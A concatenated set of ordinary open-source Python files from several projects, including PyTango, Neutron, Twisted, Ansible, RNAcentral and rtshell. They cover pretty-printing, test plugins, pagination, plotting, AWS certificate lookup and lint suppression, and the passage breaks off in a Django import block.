if dtype is not None:
x = x.astype(dtype)
return x
| bsd-3-clause |
tiagocoutinho/PyTango | tango/pytango_pprint.py | 4 | 6400 | # ------------------------------------------------------------------------------
# This file is part of PyTango (http://pytango.rtfd.io)
#
# Copyright 2006-2012 CELLS / ALBA Synchrotron, Bellaterra, Spain
# Copyright 2013-2014 European Synchrotron Radiation Facility, Grenoble, France
#
# Distributed under the terms of the GNU Lesser General Public License,
# either version 3 of the License, or (at your option) any later version.
# See LICENSE.txt for more info.
# ------------------------------------------------------------------------------
"""
This is an internal PyTango module.
"""
__all__ = ("pytango_pprint_init",)
__docformat__ = "restructuredtext"
from ._tango import (StdStringVector, StdLongVector, CommandInfoList,
AttributeInfoList, AttributeInfoListEx, PipeInfoList,
DeviceDataHistoryList,
GroupReplyList, GroupAttrReplyList, GroupCmdReplyList,
DbData, DbDevInfos, DbDevExportInfos, DbDevImportInfos, DbHistoryList,
LockerInfo, DevCommandInfo, AttributeDimension, CommandInfo, PipeInfo,
DeviceInfo, DeviceAttributeConfig, AttributeInfo, AttributeAlarmInfo,
ChangeEventInfo, PeriodicEventInfo, ArchiveEventInfo,
AttributeEventInfo, AttributeInfoEx,
DeviceAttribute, DeviceAttributeHistory, DeviceData, DeviceDataHistory,
DevicePipe, DbDatum, DbDevInfo, DbDevImportInfo, DbDevExportInfo,
DbServerInfo, GroupReply, GroupAttrReply, GroupCmdReply,
DevError, EventData, AttrConfEventData, DataReadyEventData,
TimeVal, DevFailed, CmdArgType)
from .device_server import AttributeAlarm, EventProperties
from .device_server import ChangeEventProp, PeriodicEventProp, ArchiveEventProp
from .device_server import AttributeConfig, AttributeConfig_2
from .device_server import AttributeConfig_3, AttributeConfig_5
try:
import collections.abc as collections_abc # python 3.3+
except ImportError:
import collections as collections_abc
def __inc_param(obj, name):
ret = not name.startswith('_')
ret &= name not in ('except_flags',)
ret &= not isinstance(getattr(obj, name), collections_abc.Callable)
return ret
def __single_param(obj, param_name, f=repr, fmt='%s = %s'):
param_value = getattr(obj, param_name)
if param_name is 'data_type':
param_value = CmdArgType.values.get(param_value, param_value)
return fmt % (param_name, f(param_value))
def __struct_params_s(obj, separator=', ', f=repr, fmt='%s = %s'):
"""method wrapper for printing all elements of a struct"""
s = separator.join([__single_param(obj, n, f, fmt) for n in dir(obj) if __inc_param(obj, n)])
return s
def __struct_params_repr(obj):
"""method wrapper for representing all elements of a struct"""
return __struct_params_s(obj)
def __struct_params_str(obj, fmt, f=repr):
"""method wrapper for printing all elements of a struct."""
return __struct_params_s(obj, '\n', f=f, fmt=fmt)
def __repr__Struct(self):
"""repr method for struct"""
return '%s(%s)' % (self.__class__.__name__, __struct_params_repr(self))
def __str__Struct_Helper(self, f=repr):
"""str method for struct"""
attrs = [n for n in dir(self) if __inc_param(self, n)]
fmt = attrs and '%%%ds = %%s' % max(map(len, attrs)) or "%s = %s"
return '%s[\n%s]\n' % (self.__class__.__name__, __struct_params_str(self, fmt, f))
def __str__Struct(self):
return __str__Struct_Helper(self, f=repr)
def __str__Struct_extra(self):
return __str__Struct_Helper(self, f=str)
def __registerSeqStr():
"""helper function to make internal sequences printable"""
_SeqStr = lambda self: (self and "[%s]" % (", ".join(map(repr, self)))) or "[]"
_SeqRepr = lambda self: (self and "[%s]" % (", ".join(map(repr, self)))) or "[]"
seqs = (StdStringVector, StdLongVector, CommandInfoList,
AttributeInfoList, AttributeInfoListEx, PipeInfoList,
DeviceDataHistoryList,
GroupReplyList, GroupAttrReplyList, GroupCmdReplyList,
DbData, DbDevInfos, DbDevExportInfos, DbDevImportInfos, DbHistoryList)
for seq in seqs:
seq.__str__ = _SeqStr
seq.__repr__ = _SeqRepr
def __str__DevFailed(self):
if isinstance(self.args, collections_abc.Sequence):
return 'DevFailed[\n%s]' % '\n'.join(map(str, self.args))
return 'DevFailed[%s]' % (self.args)
def __repr__DevFailed(self):
return 'DevFailed(args = %s)' % repr(self.args)
def __str__DevError(self):
desc = self.desc.replace("\n", "\n ")
s = """DevError[
desc = %s
origin = %s
reason = %s
severity = %s]\n""" % (desc, self.origin, self.reason, self.severity)
return s
def __registerStructStr():
"""helper method to register str and repr methods for structures"""
structs = (LockerInfo, DevCommandInfo, AttributeDimension, CommandInfo,
DeviceInfo, DeviceAttributeConfig, AttributeInfo, AttributeAlarmInfo,
ChangeEventInfo, PeriodicEventInfo, ArchiveEventInfo,
AttributeEventInfo, AttributeInfoEx, PipeInfo,
DeviceAttribute, DeviceAttributeHistory, DeviceData, DeviceDataHistory,
DevicePipe, DbDatum, DbDevInfo, DbDevImportInfo, DbDevExportInfo,
DbServerInfo, GroupReply, GroupAttrReply, GroupCmdReply,
DevError, EventData, AttrConfEventData, DataReadyEventData,
AttributeConfig, AttributeConfig_2, AttributeConfig_3,
AttributeConfig_5,
ChangeEventProp, PeriodicEventProp, ArchiveEventProp,
AttributeAlarm, EventProperties)
for struct in structs:
struct.__str__ = __str__Struct
struct.__repr__ = __repr__Struct
# special case for TimeVal: it already has a str representation itself
TimeVal.__repr__ = __repr__Struct
# special case for DevFailed: we want a better pretty print
# also, because it is an Exception it has the message attribute which
# generates a Deprecation warning in python 2.6
DevFailed.__str__ = __str__DevFailed
DevFailed.__repr__ = __repr__DevFailed
DevError.__str__ = __str__DevError
def pytango_pprint_init(doc=True):
__registerSeqStr()
__registerStructStr()
| lgpl-3.0 |
antonioUnina/neutron | neutron/tests/unit/dummy_plugin.py | 41 | 4644 | # Copyright 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.api import extensions
from neutron.api.v2 import base
from neutron.common import exceptions
from neutron.db import servicetype_db
from neutron.extensions import servicetype
from neutron import manager
from neutron.openstack.common import uuidutils
from neutron.plugins.common import constants
from neutron.services import service_base
DUMMY_PLUGIN_NAME = "dummy_plugin"
RESOURCE_NAME = "dummy"
COLLECTION_NAME = "%ss" % RESOURCE_NAME
# Attribute Map for dummy resource
RESOURCE_ATTRIBUTE_MAP = {
COLLECTION_NAME: {
'id': {'allow_post': False, 'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True},
'name': {'allow_post': True, 'allow_put': True,
'validate': {'type:string': None},
'is_visible': True, 'default': ''},
'tenant_id': {'allow_post': True, 'allow_put': False,
'required_by_policy': True,
'is_visible': True},
'service_type': {'allow_post': True,
'allow_put': False,
'validate': {'type:servicetype_ref': None},
'is_visible': True,
'default': None}
}
}
class Dummy(object):
@classmethod
def get_name(cls):
return "dummy"
@classmethod
def get_alias(cls):
return "dummy"
@classmethod
def get_description(cls):
return "Dummy stuff"
@classmethod
def get_namespace(cls):
return "http://docs.openstack.org/ext/neutron/dummy/api/v1.0"
@classmethod
def get_updated(cls):
return "2012-11-20T10:00:00-00:00"
@classmethod
def get_resources(cls):
"""Returns Extended Resource for dummy management."""
q_mgr = manager.NeutronManager.get_instance()
dummy_inst = q_mgr.get_service_plugins()['DUMMY']
controller = base.create_resource(
COLLECTION_NAME, RESOURCE_NAME, dummy_inst,
RESOURCE_ATTRIBUTE_MAP[COLLECTION_NAME])
return [extensions.ResourceExtension(COLLECTION_NAME,
controller)]
class DummyServicePlugin(service_base.ServicePluginBase):
"""This is a simple plugin for managing instantes of a fictional 'dummy'
service. This plugin is provided as a proof-of-concept of how
advanced service might leverage the service type extension.
Ideally, instances of real advanced services, such as load balancing
or VPN will adopt a similar solution.
"""
supported_extension_aliases = ['dummy', servicetype.EXT_ALIAS]
agent_notifiers = {'dummy': 'dummy_agent_notifier'}
def __init__(self):
self.svctype_mgr = servicetype_db.ServiceTypeManager.get_instance()
self.dummys = {}
def get_plugin_type(self):
return constants.DUMMY
def get_plugin_name(self):
return DUMMY_PLUGIN_NAME
def get_plugin_description(self):
return "Neutron Dummy Service Plugin"
def get_dummys(self, context, filters, fields):
return self.dummys.values()
def get_dummy(self, context, id, fields):
try:
return self.dummys[id]
except KeyError:
raise exceptions.NotFound()
def create_dummy(self, context, dummy):
d = dummy['dummy']
d['id'] = uuidutils.generate_uuid()
self.dummys[d['id']] = d
self.svctype_mgr.increase_service_type_refcount(context,
d['service_type'])
return d
def update_dummy(self, context, id, dummy):
pass
def delete_dummy(self, context, id):
try:
svc_type_id = self.dummys[id]['service_type']
del self.dummys[id]
self.svctype_mgr.decrease_service_type_refcount(context,
svc_type_id)
except KeyError:
raise exceptions.NotFound()
| apache-2.0 |
bonitadecker77/python-for-android | python-modules/twisted/twisted/web/test/test_resource.py | 53 | 4638 | # Copyright (c) 2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.resource}.
"""
from twisted.trial.unittest import TestCase
from twisted.web import error
from twisted.web.http import NOT_FOUND, FORBIDDEN
from twisted.web.resource import ErrorPage, NoResource, ForbiddenResource
from twisted.web.test.test_web import DummyRequest
class ErrorPageTests(TestCase):
"""
Tests for L{ErrorPage}, L{NoResource}, and L{ForbiddenResource}.
"""
errorPage = ErrorPage
noResource = NoResource
forbiddenResource = ForbiddenResource
def test_getChild(self):
"""
The C{getChild} method of L{ErrorPage} returns the L{ErrorPage} it is
called on.
"""
page = self.errorPage(321, "foo", "bar")
self.assertIdentical(page.getChild("name", object()), page)
def _pageRenderingTest(self, page, code, brief, detail):
request = DummyRequest([''])
self.assertEqual(
page.render(request),
"\n"
"<html>\n"
" <head><title>%s - %s</title></head>\n"
" <body>\n"
" <h1>%s</h1>\n"
" <p>%s</p>\n"
" </body>\n"
"</html>\n" % (code, brief, brief, detail))
self.assertEqual(request.responseCode, code)
self.assertEqual(
request.outgoingHeaders, {'content-type': 'text/html'})
def test_errorPageRendering(self):
"""
L{ErrorPage.render} returns a C{str} describing the error defined by
the response code and message passed to L{ErrorPage.__init__}. It also
uses that response code to set the response code on the L{Request}
passed in.
"""
code = 321
brief = "brief description text"
detail = "much longer text might go here"
page = self.errorPage(code, brief, detail)
self._pageRenderingTest(page, code, brief, detail)
def test_noResourceRendering(self):
"""
L{NoResource} sets the HTTP I{NOT FOUND} code.
"""
detail = "long message"
page = self.noResource(detail)
self._pageRenderingTest(page, NOT_FOUND, "No Such Resource", detail)
def test_forbiddenResourceRendering(self):
"""
L{ForbiddenResource} sets the HTTP I{FORBIDDEN} code.
"""
detail = "longer message"
page = self.forbiddenResource(detail)
self._pageRenderingTest(page, FORBIDDEN, "Forbidden Resource", detail)
class DeprecatedErrorPageTests(ErrorPageTests):
"""
Tests for L{error.ErrorPage}, L{error.NoResource}, and
L{error.ForbiddenResource}.
"""
def errorPage(self, *args):
return error.ErrorPage(*args)
def noResource(self, *args):
return error.NoResource(*args)
def forbiddenResource(self, *args):
return error.ForbiddenResource(*args)
def _assertWarning(self, name, offendingFunction):
warnings = self.flushWarnings([offendingFunction])
self.assertEqual(len(warnings), 1)
self.assertEqual(warnings[0]['category'], DeprecationWarning)
self.assertEqual(
warnings[0]['message'],
'twisted.web.error.%s is deprecated since Twisted 9.0. '
'See twisted.web.resource.%s.' % (name, name))
def test_getChild(self):
"""
Like L{ErrorPageTests.test_getChild}, but flush the deprecation warning
emitted by instantiating L{error.ErrorPage}.
"""
ErrorPageTests.test_getChild(self)
self._assertWarning('ErrorPage', self.errorPage)
def test_errorPageRendering(self):
"""
Like L{ErrorPageTests.test_errorPageRendering}, but flush the
deprecation warning emitted by instantiating L{error.ErrorPage}.
"""
ErrorPageTests.test_errorPageRendering(self)
self._assertWarning('ErrorPage', self.errorPage)
def test_noResourceRendering(self):
"""
Like L{ErrorPageTests.test_noResourceRendering}, but flush the
deprecation warning emitted by instantiating L{error.NoResource}.
"""
ErrorPageTests.test_noResourceRendering(self)
self._assertWarning('NoResource', self.noResource)
def test_forbiddenResourceRendering(self):
"""
Like L{ErrorPageTests.test_forbiddenResourceRendering}, but flush the
deprecation warning emitted by instantiating
L{error.ForbiddenResource}.
"""
ErrorPageTests.test_forbiddenResourceRendering(self)
self._assertWarning('ForbiddenResource', self.forbiddenResource)
| apache-2.0 |
CERNDocumentServer/cds-videos | cds/modules/theme/views.py | 6 | 1189 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""CDS interface."""
from __future__ import absolute_import, print_function
from flask import Blueprint
blueprint = Blueprint(
'cds',
__name__,
template_folder='templates',
static_folder='static'
)
| gpl-2.0 |
sbg/sevenbridges-python | sevenbridges/meta/collection.py | 1 | 4097 | from sevenbridges.errors import PaginationError, SbgError
from sevenbridges.models.compound.volumes.volume_object import VolumeObject
from sevenbridges.models.compound.volumes.volume_prefix import VolumePrefix
from sevenbridges.models.link import Link, VolumeLink
class Collection(list):
"""
Wrapper for SevenBridges pageable resources.
Among the actual collection items it contains information regarding
the total number of entries available in on the server and resource href.
"""
resource = None
def __init__(self, resource, href, total, items, links, api):
super().__init__(items)
self.resource = resource
self.href = href
self.links = links
self._items = items
self._total = total
self._api = api
@property
def total(self):
return int(self._total)
def all(self):
"""
Fetches all available items.
:return: Collection object.
"""
page = self._load(self.href)
while True:
try:
for item in page._items:
yield item
page = page.next_page()
except PaginationError:
break
def _load(self, url):
if self.resource is None:
raise SbgError('Undefined collection resource.')
else:
response = self._api.get(url, append_base=False)
data = response.json()
total = response.headers['x-total-matching-query']
items = [
self.resource(api=self._api, **group)
for group in data['items']
]
links = [Link(**link) for link in data['links']]
href = data['href']
return Collection(
resource=self.resource, href=href, total=total,
items=items, links=links, api=self._api
)
def next_page(self):
"""
Fetches next result set.
:return: Collection object.
"""
for link in self.links:
if link.rel.lower() == 'next':
return self._load(link.href)
raise PaginationError('No more entries.')
def previous_page(self):
"""
Fetches previous result set.
:return: Collection object.
"""
for link in self.links:
if link.rel.lower() == 'prev':
return self._load(link.href)
raise PaginationError('No more entries.')
def __repr__(self):
return (
f'<Collection: total={self.total}, available={len(self._items)}>'
)
class VolumeCollection(Collection):
def __init__(self, href, items, links, prefixes, api):
super().__init__(
VolumeObject, href, 0, items, links, api)
self.prefixes = prefixes
@property
def total(self):
return -1
def next_page(self):
"""
Fetches next result set.
:return: VolumeCollection object.
"""
for link in self.links:
if link.next:
return self._load(link.next)
raise PaginationError('No more entries.')
def previous_page(self):
raise PaginationError('Cannot paginate backwards')
def _load(self, url):
if self.resource is None:
raise SbgError('Undefined collection resource.')
else:
response = self._api.get(url, append_base=False)
data = response.json()
items = [
self.resource(api=self._api, **group) for group in
data['items']
]
prefixes = [
VolumePrefix(api=self._api, **prefix) for prefix in
data['prefixes']
]
links = [VolumeLink(**link) for link in data['links']]
href = data['href']
return VolumeCollection(
href=href, items=items, links=links,
prefixes=prefixes, api=self._api
)
def __repr__(self):
return f'<VolumeCollection: items={len(self._items)}>'
| apache-2.0 |
google/brain-tokyo-workshop | WANNRelease/prettyNEAT/vis/lplot.py | 2 | 2027 | """
Laconic plot functions to replace some of the matplotlibs verbosity
"""
from matplotlib import pyplot as plt
import numpy as np
import seaborn as sns
# -- File I/O ------------------------------------------------------------ -- #
def lsave(data,fileName):
np.savetxt(fileName, data, delimiter=',',fmt='%1.2e')
def lload(fileName):
return np.loadtxt(fileName, delimiter=',')
# -- Basic Plotting ------------------------------------------------------ -- #
def lplot(*args,label=[],axis=False):
"""Plots an vector, a set of vectors, with or without an x scale
"""
fig, ax = getAxis(axis)
if len(args) == 1: # No xscale
x = np.arange(np.shape(args)[1])
y = args[0]
if len(args) == 2: # xscale given
x = args[0]
y = args[1]
if np.ndim(y) == 2:
for i in range(np.shape(y)[1]):
ax.plot(x,y[:,i],'-')
if len(label) > 0:
ax.legend((label))
else:
ax.plot(x,y,'o-')
if axis is False:
return fig, ax
else:
return ax
def ldist(x, axis=False):
"""Plots histogram with estimated distribution
"""
fig, ax = getAxis(axis)
if isinstance(x, str):
vals = lload(x)
else:
vals = x
sns.distplot(vals.flatten(),ax=ax,bins=10)
#sns.distplot(vals.flatten(),ax=ax,hist_kws={"histtype": "step", "linewidth": 3, "alpha": 1, "color": "g"})
return ax
def lquart(x,y,label=[],axis=False):
"""Plots quartiles, x is a vector, y is a matrix with same length as x
"""
if axis is not False:
ax = axis
fig = ax.figure.canvas
else:
fig, ax = plt.subplots()
q = np.percentile(y,[25,50,75],axis=1)
plt.plot(x,q[1,:],label=label) # median
plt.plot(x,q[0,:],'k:',alpha=0.5)
plt.plot(x,q[2,:],'k:',alpha=0.5)
plt.fill_between(x,q[0,:],q[2,:],alpha=0.25)
return ax
def getAxis(axis):
if axis is not False:
ax = axis
fig = ax.figure.canvas
else:
fig, ax = plt.subplots()
return fig,ax
# -- --------------- -- --------------------------------------------#
| apache-2.0 |
srikantbmandal/ansible | lib/ansible/modules/cloud/amazon/iam_server_certificate_facts.py | 77 | 5772 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: iam_server_certificate_facts
short_description: Retrieve the facts of a server certificate
description:
- Retrieve the attributes of a server certificate
version_added: "2.2"
author: "Allen Sanabria (@linuxdynasty)"
requirements: [boto3, botocore]
options:
name:
description:
- The name of the server certificate you are retrieving attributes for.
required: true
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Retrieve server certificate
- iam_server_certificate_facts:
name: production-cert
register: server_cert
# Fail if the server certificate name was not found
- iam_server_certificate_facts:
name: production-cert
register: server_cert
failed_when: "{{ server_cert.results | length == 0 }}"
'''
RETURN = '''
server_certificate_id:
description: The 21 character certificate id
returned: success
type: str
sample: "ADWAJXWTZAXIPIMQHMJPO"
certificate_body:
description: The asn1der encoded PEM string
returned: success
type: str
sample: "-----BEGIN CERTIFICATE-----\nbunch of random data\n-----END CERTIFICATE-----"
server_certificate_name:
description: The name of the server certificate
returned: success
type: str
sample: "server-cert-name"
arn:
description: The Amazon resource name of the server certificate
returned: success
type: str
sample: "arn:aws:iam::911277865346:server-certificate/server-cert-name"
path:
description: The path of the server certificate
returned: success
type: str
sample: "/"
expiration:
description: The date and time this server certificate will expire, in ISO 8601 format.
returned: success
type: str
sample: "2017-06-15T12:00:00+00:00"
upload_date:
description: The date and time this server certificate was uploaded, in ISO 8601 format.
returned: success
type: str
sample: "2015-04-25T00:36:40+00:00"
'''
try:
import boto3
import botocore.exceptions
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def get_server_certs(iam, name=None):
"""Retrieve the attributes of a server certificate if it exists or all certs.
Args:
iam (botocore.client.IAM): The boto3 iam instance.
Kwargs:
name (str): The name of the server certificate.
Basic Usage:
>>> import boto3
>>> iam = boto3.client('iam')
>>> name = "server-cert-name"
>>> results = get_server_certs(iam, name)
{
"upload_date": "2015-04-25T00:36:40+00:00",
"server_certificate_id": "ADWAJXWTZAXIPIMQHMJPO",
"certificate_body": "-----BEGIN CERTIFICATE-----\nbunch of random data\n-----END CERTIFICATE-----",
"server_certificate_name": "server-cert-name",
"expiration": "2017-06-15T12:00:00+00:00",
"path": "/",
"arn": "arn:aws:iam::911277865346:server-certificate/server-cert-name"
}
"""
results = dict()
try:
if name:
server_certs = [iam.get_server_certificate(ServerCertificateName=name)['ServerCertificate']]
else:
server_certs = iam.list_server_certificates()['ServerCertificateMetadataList']
for server_cert in server_certs:
if not name:
server_cert = iam.get_server_certificate(ServerCertificateName=server_cert['ServerCertificateName'])['ServerCertificate']
cert_md = server_cert['ServerCertificateMetadata']
results[cert_md['ServerCertificateName']] = {
'certificate_body': server_cert['CertificateBody'],
'server_certificate_id': cert_md['ServerCertificateId'],
'server_certificate_name': cert_md['ServerCertificateName'],
'arn': cert_md['Arn'],
'path': cert_md['Path'],
'expiration': cert_md['Expiration'].isoformat(),
'upload_date': cert_md['UploadDate'].isoformat(),
}
except botocore.exceptions.ClientError:
pass
return results
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
name=dict(type='str'),
))
module = AnsibleModule(argument_spec=argument_spec,)
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
iam = boto3_conn(module, conn_type='client', resource='iam', region=region, endpoint=ec2_url, **aws_connect_kwargs)
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Boto3 Client Error - " + str(e.msg))
cert_name = module.params.get('name')
results = get_server_certs(iam, cert_name)
module.exit_json(results=results)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 |
TribeMedia/sky_engine | build/android/lint/suppress.py | 96 | 3912 | #!/usr/bin/env python
#
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Add all generated lint_result.xml files to suppressions.xml"""
import collections
import optparse
import os
import sys
from xml.dom import minidom
_BUILD_ANDROID_DIR = os.path.join(os.path.dirname(__file__), '..')
sys.path.append(_BUILD_ANDROID_DIR)
from pylib import constants
_THIS_FILE = os.path.abspath(__file__)
_CONFIG_PATH = os.path.join(os.path.dirname(_THIS_FILE), 'suppressions.xml')
_DOC = (
'\nSTOP! It looks like you want to suppress some lint errors:\n'
'- Have you tried identifing the offending patch?\n'
' Ask the author for a fix and/or revert the patch.\n'
'- It is preferred to add suppressions in the code instead of\n'
' sweeping it under the rug here. See:\n\n'
' http://developer.android.com/tools/debugging/improving-w-lint.html\n'
'\n'
'Still reading?\n'
'- You can edit this file manually to suppress an issue\n'
' globally if it is not applicable to the project.\n'
'- You can also automatically add issues found so for in the\n'
' build process by running:\n\n'
' ' + os.path.relpath(_THIS_FILE, constants.DIR_SOURCE_ROOT) + '\n\n'
' which will generate this file (Comments are not preserved).\n'
' Note: PRODUCT_DIR will be substituted at run-time with actual\n'
' directory path (e.g. out/Debug)\n'
)
_Issue = collections.namedtuple('Issue', ['severity', 'paths'])
def _ParseConfigFile(config_path):
print 'Parsing %s' % config_path
issues_dict = {}
dom = minidom.parse(config_path)
for issue in dom.getElementsByTagName('issue'):
issue_id = issue.attributes['id'].value
severity = issue.getAttribute('severity')
paths = set(
[p.attributes['path'].value for p in
issue.getElementsByTagName('ignore')])
issues_dict[issue_id] = _Issue(severity, paths)
return issues_dict
def _ParseAndMergeResultFile(result_path, issues_dict):
print 'Parsing and merging %s' % result_path
dom = minidom.parse(result_path)
for issue in dom.getElementsByTagName('issue'):
issue_id = issue.attributes['id'].value
severity = issue.attributes['severity'].value
path = issue.getElementsByTagName('location')[0].attributes['file'].value
if issue_id not in issues_dict:
issues_dict[issue_id] = _Issue(severity, set())
issues_dict[issue_id].paths.add(path)
def _WriteConfigFile(config_path, issues_dict):
new_dom = minidom.getDOMImplementation().createDocument(None, 'lint', None)
top_element = new_dom.documentElement
top_element.appendChild(new_dom.createComment(_DOC))
for issue_id in sorted(issues_dict.keys()):
severity = issues_dict[issue_id].severity
paths = issues_dict[issue_id].paths
issue = new_dom.createElement('issue')
issue.attributes['id'] = issue_id
if severity:
issue.attributes['severity'] = severity
if severity == 'ignore':
print 'Warning: [%s] is suppressed globally.' % issue_id
else:
for path in sorted(paths):
ignore = new_dom.createElement('ignore')
ignore.attributes['path'] = path
issue.appendChild(ignore)
top_element.appendChild(issue)
with open(config_path, 'w') as f:
f.write(new_dom.toprettyxml(indent=' ', encoding='utf-8'))
print 'Updated %s' % config_path
def _Suppress(config_path, result_path):
issues_dict = _ParseConfigFile(config_path)
_ParseAndMergeResultFile(result_path, issues_dict)
_WriteConfigFile(config_path, issues_dict)
def main():
parser = optparse.OptionParser(usage='%prog RESULT-FILE')
_, args = parser.parse_args()
if len(args) != 1 or not os.path.exists(args[0]):
parser.error('Must provide RESULT-FILE')
_Suppress(_CONFIG_PATH, args[0])
if __name__ == '__main__':
main()
| bsd-3-clause |
RNAcentral/rnacentral-webcode | rnacentral/portal/management/commands/update_example_locations.py | 1 | 4551 | """
Copyright [2009-2017] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
from django.core.management.base import BaseCommand
from portal.models import EnsemblAssembly
from portal.models import SequenceRegion
example_locations = {
'homo_sapiens': {
'chromosome': 'X',
'start': 73819307,
'end': 73856333,
},
'mus_musculus': {
'chromosome': 1,
'start': 86351908,
'end': 86352200,
},
'danio_rerio': {
'chromosome': 9,
'start': 7633910,
'end': 7634210,
},
'bos_taurus': {
'chromosome': 15,
'start': 82197673,
'end': 82197837,
},
'rattus_norvegicus': {
'chromosome': 'X',
'start': 118277628,
'end': 118277850,
},
'felis_catus': {
'chromosome': 'X',
'start': 18058223,
'end': 18058546,
},
'macaca_mulatta': {
'chromosome': 1,
'start': 146238837,
'end': 146238946,
},
'pan_troglodytes': {
'chromosome': 11,
'start': 78369004,
'end': 78369219,
},
'canis_familiaris': {
'chromosome': 19,
'start': 22006909,
'end': 22007119,
},
'gallus_gallus': {
'chromosome': 9,
'start': 15676031,
'end': 15676160,
},
'xenopus_tropicalis': {
'chromosome': 'NC_006839',
'start': 11649,
'end': 11717,
},
'saccharomyces_cerevisiae': {
'chromosome': 'XII',
'start': 856709,
'end': 856919,
},
'schizosaccharomyces_pombe': {
'chromosome': 'I',
'start': 540951,
'end': 544327,
},
'triticum_aestivum': {
'chromosome': '6A',
'start': 100656614,
'end': 100656828,
},
'caenorhabditis_elegans': {
'chromosome': 'III',
'start': 11467363,
'end': 11467705,
},
'drosophila_melanogaster': {
'chromosome': '3R',
'start': 7474331,
'end': 7475217,
},
'bombyx_mori': {
'chromosome': 'scaf16',
'start': 6180018,
'end': 6180422,
},
'anopheles_gambiae': {
'chromosome': '2R',
'start': 34644956,
'end': 34645131,
},
'dictyostelium_discoideum': {
'chromosome': 2,
'start': 7874546,
'end': 7876498,
},
'plasmodium_falciparum': {
'chromosome': 13,
'start': 2796339,
'end': 2798488,
},
'arabidopsis_thaliana': {
'chromosome': 2,
'start': 18819643,
'end': 18822629,
}
}
def update_example_locations():
"""
"""
for assembly in EnsemblAssembly.objects.filter().all():
print(assembly.ensembl_url)
if assembly.ensembl_url in example_locations:
assembly.example_chromosome = example_locations[assembly.ensembl_url]['chromosome']
assembly.example_start = example_locations[assembly.ensembl_url]['start']
assembly.example_end = example_locations[assembly.ensembl_url]['end']
assembly.save()
continue
try:
region = SequenceRegion.objects.filter(assembly_id=assembly.assembly_id).all()[:1].get()
assembly.example_chromosome = region.chromosome
assembly.example_start = region.region_start
assembly.example_end = region.region_stop
print('\t', assembly.assembly_id, region.chromosome, region.region_start, region.region_stop)
assembly.save()
except SequenceRegion.DoesNotExist:
print('No regions found {}'.format(assembly.ensembl_url))
except SequenceRegion.MultipleObjectsReturned:
print('Multiple assemblies found {}'.format(assembly.ensembl_url))
class Command(BaseCommand):
"""
Usage:
python manage.py update_example_locations
"""
def handle(self, *args, **options):
"""Main function, called by django."""
update_example_locations()
| apache-2.0 |
gbiggs/rtshell | rtshell/path.py | 2 | 1105 | #!/usr/bin/env python2
# -*- Python -*-
# -*- coding: utf-8 -*-
'''rtshell
Copyright (C) 2009-2015
Geoffrey Biggs
RT-Synthesis Research Group
Intelligent Systems Research Institute,
National Institute of Advanced Industrial Science and Technology (AIST),
Japan
All rights reserved.
Licensed under the GNU Lesser General Public License version 3.
http://www.gnu.org/licenses/lgpl-3.0.en.html
Functions for dealing with input paths.
'''
import os
ENV_VAR='RTCSH_CWD'
def cmd_path_to_full_path(cmd_path):
'''Given a path from the user, returns a suitable full path based on the
value of the environment variable specified in ENV_VAR.
'''
if cmd_path.startswith('/'):
return cmd_path
if ENV_VAR in os.environ and os.environ[ENV_VAR]:
if os.environ[ENV_VAR].endswith('/') or cmd_path.startswith('/'):
return os.environ[ENV_VAR] + cmd_path
else:
return os.environ[ENV_VAR] + '/' + cmd_path
# If ENV_VAR is not set, assume the current working dir is the root dir
return '/' + cmd_path
# vim: tw=79
| lgpl-3.0 |
jamslevy/gsoc | app/django/contrib/comments/views/moderation.py | 15 | 6664 | from django import template
from django.conf import settings
from django.shortcuts import get_object_or_404, render_to_response
from django.contrib.auth.decorators import login_required, permission_required
